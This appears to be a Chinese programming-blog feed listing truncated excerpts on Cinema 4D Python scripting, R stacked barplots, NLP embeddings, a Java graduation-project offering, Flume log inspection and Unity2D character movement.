当你问AI助手比如豆包,如何用python禁止掉xpresso标签时候,它会提示到 这时候要用到两个东西。https://developers.maxon.net/论坛搜索和开发文档 比如这里我就在官方找到正确的id描述 然后我就把参数标签换过来

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

计算机毕业设计 大学志愿填报系统 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试

🍊作者:计算机编程-吉哥 🍊简介:专业从事JavaWeb程序开发,微信小程序开发,定制化项目、 源码、代码讲解、文档撰写、ppt制作。做自己喜欢的事,生活就是快乐的。 🍊心愿:点赞 👍 收藏 ⭐评论 📝 🍅 文末获取源码联系 👇🏻 精彩专栏推荐订阅 👇🏻 不然下次找不到哟~Java毕业设计项目~热门选题推荐《1000套》 目录 1.技术选型 2.开发工具 3.功能

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

用Unity2D制作一个人物,实现移动、跳起、人物静止和动起来时的动画:中(人物移动、跳起、静止动作)

上回我们学到创建一个地形和一个人物,今天我们实现一下人物实现移动和跳起,依次点击,我们准备创建一个C#文件 创建好我们点击进去,就会跳转到我们的Vision Studio,然后输入这些代码 using UnityEngine;public class Move : MonoBehaviour // 定义一个名为Move的类,继承自MonoBehaviour{private Rigidbo